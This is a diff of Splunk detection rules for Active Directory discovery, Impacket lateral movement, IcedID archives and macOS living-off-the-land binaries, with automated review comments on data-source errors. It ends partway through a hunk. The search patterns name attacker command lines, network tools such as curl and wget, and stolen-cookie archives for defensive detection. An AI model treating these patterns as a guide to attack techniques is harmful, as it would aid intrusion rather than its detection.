diff --git a/detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml b/detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml
index 0fc63d761e..d349cb5654 100644
--- a/detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml
+++ b/detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` ru
and potential exploitation of domain security settings.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADDefaultDomainPasswordPolicy*"
diff --git a/detections/endpoint/get_aduser_with_powershell.yml b/detections/endpoint/get_aduser_with_powershell.yml
index cfc54fe740..4b3d94f474 100644
--- a/detections/endpoint/get_aduser_with_powershell.yml
+++ b/detections/endpoint/get_aduser_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
targets and plan subsequent attacks.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADUser*"
diff --git a/detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml b/detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml
index cb7cfc985d..32f37856d5 100644
--- a/detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml
+++ b/detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` ru
aiding in further attacks such as password spraying or brute force attempts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADUserResultantPasswordPolicy*"
diff --git a/detections/endpoint/get_domainpolicy_with_powershell.yml b/detections/endpoint/get_domainpolicy_with_powershell.yml
index 327f40553b..7a2e87b802 100644
--- a/detections/endpoint/get_domainpolicy_with_powershell.yml
+++ b/detections/endpoint/get_domainpolicy_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` ru
aiding in privilege escalation and lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
OR Processes.process_name="powershell*") AND Processes.process = "*Get-DomainPolicy*"
diff --git a/detections/endpoint/get_domaintrust_with_powershell.yml b/detections/endpoint/get_domaintrust_with_powershell.yml
index 4932bbe871..bda69be0e0 100644
--- a/detections/endpoint/get_domaintrust_with_powershell.yml
+++ b/detections/endpoint/get_domaintrust_with_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the execution of the Get-DomainTr
the domain.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process=*get-domaintrust*
by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/get_domainuser_with_powershell.yml b/detections/endpoint/get_domainuser_with_powershell.yml
index f72d056f00..da73ac277b 100644
--- a/detections/endpoint/get_domainuser_with_powershell.yml
+++ b/detections/endpoint/get_domainuser_with_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
leading to further exploitation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
OR Processes.process_name="powershell*") AND Processes.process = "*Get-DomainUser*"
diff --git a/detections/endpoint/get_foresttrust_with_powershell.yml b/detections/endpoint/get_foresttrust_with_powershell.yml
index d14075d71f..0bd85b5a93 100644
--- a/detections/endpoint/get_foresttrust_with_powershell.yml
+++ b/detections/endpoint/get_foresttrust_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Get-ForestTrust
escalation within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe
OR Processes.process_name=cmd.exe Processes.process=*get-foresttrust* by Processes.dest
diff --git a/detections/endpoint/get_wmiobject_group_discovery.yml b/detections/endpoint/get_wmiobject_group_discovery.yml
index 1c49b46dd9..2e98a4c861 100644
--- a/detections/endpoint/get_wmiobject_group_discovery.yml
+++ b/detections/endpoint/get_wmiobject_group_discovery.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of the `Get-WMIObject Win32_
or unauthorized access to sensitive resources.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=powershell.exe
OR processes.process_name=cmd.exe) (Processes.process="*Get-WMIObject*" AND Processes.process="*Win32_Group*")
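Review bot: `processes.process_name=cmd.exe` is lower-case while every other field in this search is `Processes.*`; Splunk field names are case-sensitive, so in a tstats over the data model this condition does not bind to the Processes node and the cmd.exe branch of the OR is effectively dead (or an error, depending on version). It should read `OR Processes.process_name=cmd.exe)`. Adding 4688 and ProcessRollup2 as sources does not change this, since all three feed the same data-model field. The search string continues past the end of this hunk.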
diff --git a/detections/endpoint/getadcomputer_with_powershell.yml b/detections/endpoint/getadcomputer_with_powershell.yml
index fd71cbaada..abc814c1b9 100644
--- a/detections/endpoint/getadcomputer_with_powershell.yml
+++ b/detections/endpoint/getadcomputer_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
attacks, potentially leading to unauthorized access and data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-AdComputer*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getadgroup_with_powershell.yml b/detections/endpoint/getadgroup_with_powershell.yml
index 83900cb33a..78cbf49c22 100644
--- a/detections/endpoint/getadgroup_with_powershell.yml
+++ b/detections/endpoint/getadgroup_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-AdGroup*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getcurrent_user_with_powershell.yml b/detections/endpoint/getcurrent_user_with_powershell.yml
index a3f858c269..063bf16ec7 100644
--- a/detections/endpoint/getcurrent_user_with_powershell.yml
+++ b/detections/endpoint/getcurrent_user_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
potentially facilitating further exploitation and lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*System.Security.Principal.WindowsIdentity* OR Processes.process=*GetCurrent()*)
diff --git a/detections/endpoint/getdomaincomputer_with_powershell.yml b/detections/endpoint/getdomaincomputer_with_powershell.yml
index 0dba51ad46..20beca8a43 100644
--- a/detections/endpoint/getdomaincomputer_with_powershell.yml
+++ b/detections/endpoint/getdomaincomputer_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
further attacks, potentially leading to unauthorized access and data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-DomainComputer*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getdomaincontroller_with_powershell.yml b/detections/endpoint/getdomaincontroller_with_powershell.yml
index b1e963083d..a2b4dab869 100644
--- a/detections/endpoint/getdomaincontroller_with_powershell.yml
+++ b/detections/endpoint/getdomaincontroller_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
exploitation and lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-DomainController*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getdomaingroup_with_powershell.yml b/detections/endpoint/getdomaingroup_with_powershell.yml
index 33f2b2f707..0c8f9512fd 100644
--- a/detections/endpoint/getdomaingroup_with_powershell.yml
+++ b/detections/endpoint/getdomaingroup_with_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
privilege escalation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-DomainGroup*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getlocaluser_with_powershell.yml b/detections/endpoint/getlocaluser_with_powershell.yml
index 16483c1c3c..c68191a45e 100644
--- a/detections/endpoint/getlocaluser_with_powershell.yml
+++ b/detections/endpoint/getlocaluser_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
privilege escalation within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-LocalUser*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getnettcpconnection_with_powershell.yml b/detections/endpoint/getnettcpconnection_with_powershell.yml
index e10e64b62a..3eb51f64e7 100644
--- a/detections/endpoint/getnettcpconnection_with_powershell.yml
+++ b/detections/endpoint/getnettcpconnection_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `powershell.exe`
the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-NetTcpConnection*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getwmiobject_ds_computer_with_powershell.yml b/detections/endpoint/getwmiobject_ds_computer_with_powershell.yml
index 73de135fe8..296d8e1db3 100644
--- a/detections/endpoint/getwmiobject_ds_computer_with_powershell.yml
+++ b/detections/endpoint/getwmiobject_ds_computer_with_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
potentially leading to unauthorized access and data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-WmiObject* AND Processes.process="*namespace root\\directory\\ldap*"
diff --git a/detections/endpoint/getwmiobject_ds_group_with_powershell.yml b/detections/endpoint/getwmiobject_ds_group_with_powershell.yml
index f9dd5ae4a3..bc8d730680 100644
--- a/detections/endpoint/getwmiobject_ds_group_with_powershell.yml
+++ b/detections/endpoint/getwmiobject_ds_group_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `powershell.exe`
insights into the domain structure, aiding in further attacks and privilege escalation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-WmiObject* AND Processes.process="*namespace root\\directory\\ldap*"
diff --git a/detections/endpoint/getwmiobject_ds_user_with_powershell.yml b/detections/endpoint/getwmiobject_ds_user_with_powershell.yml
index 5ede6227b8..d2cde911cf 100644
--- a/detections/endpoint/getwmiobject_ds_user_with_powershell.yml
+++ b/detections/endpoint/getwmiobject_ds_user_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
privilege escalation and lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
OR Processes.process_name="powershell*") AND Processes.process = "*get-wmiobject*"
diff --git a/detections/endpoint/getwmiobject_user_account_with_powershell.yml b/detections/endpoint/getwmiobject_user_account_with_powershell.yml
index ec1580ffee..a9d593662c 100644
--- a/detections/endpoint/getwmiobject_user_account_with_powershell.yml
+++ b/detections/endpoint/getwmiobject_user_account_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
or lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
(Processes.process=*Get-WmiObject* AND Processes.process=*Win32_UserAccount*) by
diff --git a/detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml b/detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml
index d79351156a..76ce24e0be 100644
--- a/detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml
+++ b/detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the execution of gpupdate.exe withou
lateral movement, command and control, or other nefarious purposes, potentially
leading to system compromise.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=gpupdate.exe by _time span=1h Processes.process_id
Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process
diff --git a/detections/endpoint/headless_browser_mockbin_or_mocky_request.yml b/detections/endpoint/headless_browser_mockbin_or_mocky_request.yml
index eac39a1875..0ffc7a1d57 100644
--- a/detections/endpoint/headless_browser_mockbin_or_mocky_request.yml
+++ b/detections/endpoint/headless_browser_mockbin_or_mocky_request.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects headless browser activity accessing mockbin.org
or mocky.io. It identifies processes with the "--headless" and "--disable-gpu" command
line arguments, along with references to mockbin.org or mocky.io. This behavior
diff --git a/detections/endpoint/headless_browser_usage.yml b/detections/endpoint/headless_browser_usage.yml
index c81b4af1fc..bf3b7080c1 100644
--- a/detections/endpoint/headless_browser_usage.yml
+++ b/detections/endpoint/headless_browser_usage.yml
@@ -7,6 +7,8 @@ status: production
type: Hunting
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: 'The following analytic detects the usage of headless browsers within
an organization. It identifies processes containing the "--headless" and "--disable-gpu"
command line arguments, which are indicative of headless browsing. This detection
diff --git a/detections/endpoint/hide_user_account_from_sign_in_screen.yml b/detections/endpoint/hide_user_account_from_sign_in_screen.yml
index 69341e54f5..d5316561c5 100644
--- a/detections/endpoint/hide_user_account_from_sign_in_screen.yml
+++ b/detections/endpoint/hide_user_account_from_sign_in_screen.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a suspicious registry modification t
the attacker to maintain undetected access and control over the system, posing a
severe security risk.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path="*\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist*"
diff --git a/detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml b/detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml
index 14fa643a85..7602cac895 100644
--- a/detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml
+++ b/detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the Windows binary attrib
or data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) values(Processes.process)
as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=attrib.exe
(Processes.process=*+h*) by Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/hunting_3cxdesktopapp_software.yml b/detections/endpoint/hunting_3cxdesktopapp_software.yml
index 73a147297d..d9914ac6c4 100644
--- a/detections/endpoint/hunting_3cxdesktopapp_software.yml
+++ b/detections/endpoint/hunting_3cxdesktopapp_software.yml
@@ -7,6 +7,8 @@ type: Hunting
status: production
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the presence of any version of the 3CXDesktopApp,
also known as the 3CX Desktop App, on Mac or Windows systems. It leverages the Endpoint
data model's Processes node to identify instances of the application running, although
diff --git a/detections/endpoint/icacls_deny_command.yml b/detections/endpoint/icacls_deny_command.yml
index 439ab93512..a6158bdba3 100644
--- a/detections/endpoint/icacls_deny_command.yml
+++ b/detections/endpoint/icacls_deny_command.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances where an adversary modifie
incident response efforts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN( "icacls.exe",
"cacls.exe", "xcacls.exe") AND Processes.process IN ("*/deny*", "*/D*") by Processes.parent_process_name
diff --git a/detections/endpoint/icacls_grant_command.yml b/detections/endpoint/icacls_grant_command.yml
index a3fac0b278..82e167f054 100644
--- a/detections/endpoint/icacls_grant_command.yml
+++ b/detections/endpoint/icacls_grant_command.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the ICACLS command to gra
data exfiltration, or further system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN( "icacls.exe",
"cacls.exe", "xcacls.exe") AND Processes.process IN ("*/grant*", "*/G*") by Processes.parent_process_name
diff --git a/detections/endpoint/icedid_exfiltrated_archived_file_creation.yml b/detections/endpoint/icedid_exfiltrated_archived_file_creation.yml
index 735ce37077..6998dd405f 100644
--- a/detections/endpoint/icedid_exfiltrated_archived_file_creation.yml
+++ b/detections/endpoint/icedid_exfiltrated_archived_file_creation.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation of suspicious files nam
or escalate their presence within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '`sysmon` EventCode= 11 (TargetFilename = "*\\passff.tar" OR TargetFilename
= "*\\cookie.tar") |stats count min(_time) as firstTime max(_time) as lastTime by
TargetFilename EventCode process_id process_name dest | `security_content_ctime(firstTime)`
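Review bot: The data_source list now declares `Windows Event Log Security 4688` and `CrowdStrike ProcessRollup2`, but the search reads `` `sysmon` EventCode= 11 `` straight from the Sysmon sourcetype, so neither added source, nor the pre-existing `Sysmon EventID 1`, can feed this analytic; the only input it actually consumes is Sysmon file-creation events. The list should be just `- Sysmon EventID 11` unless the search is rewritten against `Endpoint.Filesystem`. Presumably this field drives where the detection is considered deployable, so a misdeclared source is misleading rather than harmless.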
diff --git a/detections/endpoint/impacket_lateral_movement_commandline_parameters.yml b/detections/endpoint/impacket_lateral_movement_commandline_parameters.yml
index 4f1f6c8e85..052911de65 100644
--- a/detections/endpoint/impacket_lateral_movement_commandline_parameters.yml
+++ b/detections/endpoint/impacket_lateral_movement_commandline_parameters.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the use of suspicious command-lin
exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe
(Processes.process = "*/Q /c * \\\\127.0.0.1\\*$*" AND Processes.process IN ("*2>&1*","*2>&1*"))
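Review bot: `Processes.process IN ("*2>&1*","*2>&1*")` lists the identical pattern twice; the second entry is redundant and looks like a copy-paste where a variant was intended, for example the caret-escaped `2^>^&1` form that appears when the redirection is passed through cmd.exe. Either drop the duplicate or replace it with the intended variant, e.g. `Processes.process IN ("*2>&1*","*2^>^&1*")`, after confirming against the test data what form the tooling actually emits. The search string continues past the end of this hunk.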
diff --git a/detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml b/detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml
index bfd9ce7673..efcc0dd700 100644
--- a/detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml
+++ b/detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies suspicious command-line parameters
associated with the use of Impacket's smbexec.py for lateral movement. It leverages
data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line
diff --git a/detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml b/detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml
index 974ea619a2..bbece08e39 100644
--- a/detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml
+++ b/detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the use of Impacket's `wmiexec.py` tool
for lateral movement by identifying specific command-line parameters. It leverages
data from Endpoint Detection and Response (EDR) agents, focusing on processes spawned
diff --git a/detections/endpoint/java_writing_jsp_file.yml b/detections/endpoint/java_writing_jsp_file.yml
index ec20cfe789..d52ac5996c 100644
--- a/detections/endpoint/java_writing_jsp_file.yml
+++ b/detections/endpoint/java_writing_jsp_file.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the Java process writing a .jsp file
this could allow unauthorized access, data exfiltration, or further compromise of
the affected system, posing a severe security risk.
data_source:
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name IN ("java","java.exe", "javaw.exe") by _time Processes.process_id
Processes.process_name Processes.dest Processes.process_guid Processes.user | `drop_dm_object_name(Processes)`
diff --git a/detections/endpoint/jscript_execution_using_cscript_app.yml b/detections/endpoint/jscript_execution_using_cscript_app.yml
index d1eb286807..4e6cb61b70 100644
--- a/detections/endpoint/jscript_execution_using_cscript_app.yml
+++ b/detections/endpoint/jscript_execution_using_cscript_app.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of JScript using the c
scripts, leading to code execution, data exfiltration, or further system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
= "cscript.exe" AND Processes.parent_process = "*//e:jscript*") OR (Processes.process_name
diff --git a/detections/endpoint/local_account_discovery_with_net.yml b/detections/endpoint/local_account_discovery_with_net.yml
index 11f6fcf8f6..8af1029345 100644
--- a/detections/endpoint/local_account_discovery_with_net.yml
+++ b/detections/endpoint/local_account_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `net.exe` or `net1.
lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_net` (Processes.process=*user
OR Processes.process=*users) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/local_account_discovery_with_wmic.yml b/detections/endpoint/local_account_discovery_with_wmic.yml
index b00c30fc36..dc3b012ed7 100644
--- a/detections/endpoint/local_account_discovery_with_wmic.yml
+++ b/detections/endpoint/local_account_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `wmic.exe` with com
escalation, or lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_wmic` (Processes.process=*useraccount*)
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/macos___re_opened_applications.yml b/detections/endpoint/macos___re_opened_applications.yml
index 9f91115aab..0a7e2b4bec 100644
--- a/detections/endpoint/macos___re_opened_applications.yml
+++ b/detections/endpoint/macos___re_opened_applications.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies processes referencing plist files
allow an attacker to execute code or maintain persistence on the affected system,
potentially leading to further compromise.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*com.apple.loginwindow*"
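Review bot: `Sysmon EventID 1` is the sole declared source for an analytic whose filter `*com.apple.loginwindow*` only makes sense on macOS, but Sysmon ships for Windows and Linux, not macOS, so whatever actually populates `Endpoint.Processes` here (osquery or another EDR) is not named. Consider replacing it with the real source, e.g. `- osquery` as the other macOS detections in this set declare, or leaving a note that Endpoint.Processes on macOS is fed by the installed EDR. The spelling fix in this hunk is fine as far as it goes. The search string continues past the end of this hunk.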
diff --git a/detections/endpoint/macos_lolbin.yml b/detections/endpoint/macos_lolbin.yml
index 4ba5210d12..eb2f4574d6 100644
--- a/detections/endpoint/macos_lolbin.yml
+++ b/detections/endpoint/macos_lolbin.yml
@@ -14,7 +14,7 @@ description: The following analytic detects multiple executions of Living off th
arbitrary code, escalate privileges, or persist within the environment, posing a
significant security risk.
data_source: []
-search: '`osquery` name=es_process_events columns.cmdline IN ("find*", "crontab*",
+search: '`osquery_macro` name=es_process_events columns.cmdline IN ("find*", "crontab*",
"screencapture*", "openssl*", "curl*", "wget*", "killall*", "funzip*") | rename
columns.* as * | stats min(_time) as firstTime max(_time) as lastTime values(cmdline)
as cmdline, values(pid) as pid, values(parent) as parent, values(path) as path,
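Review bot: `data_source: []` leaves this analytic with no declared source even though the search is built on `osquery_macro` and `es_process_events`, while the neighbouring macos_plutil detection declares `- osquery` for exactly the same input. It should be `data_source:` followed by `- osquery` so the two stay consistent and the source mapping is not silently empty. The search string continues past the end of this hunk.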
diff --git a/detections/endpoint/macos_plutil.yml b/detections/endpoint/macos_plutil.yml
index f35e0216ee..5052388030 100644
--- a/detections/endpoint/macos_plutil.yml
+++ b/detections/endpoint/macos_plutil.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the usage of the `plutil` command to
security.
data_source:
- osquery
-search: '`osquery` name=es_process_events columns.path=/usr/bin/plutil | rename columns.*
+search: '`osquery_macro` name=es_process_events columns.path=/usr/bin/plutil | rename columns.*
as * | stats count min(_time) as firstTime max(_time) as lastTime by username host
cmdline pid path parent signing_id | rename username as user, cmdline as process,
path as process_path, host as dest | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
diff --git a/detections/endpoint/malicious_inprocserver32_modification.yml b/detections/endpoint/malicious_inprocserver32_modification.yml
index 602e7ee42d..4ebe25fee1 100644
--- a/detections/endpoint/malicious_inprocserver32_modification.yml
+++ b/detections/endpoint/malicious_inprocserver32_modification.yml
@@ -13,9 +13,8 @@ description: The following analytic detects a process modifying the registry wit
malicious, this could allow an attacker to persist in the environment, execute arbitrary
code, or escalate privileges, posing a severe threat to system integrity and security.
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12
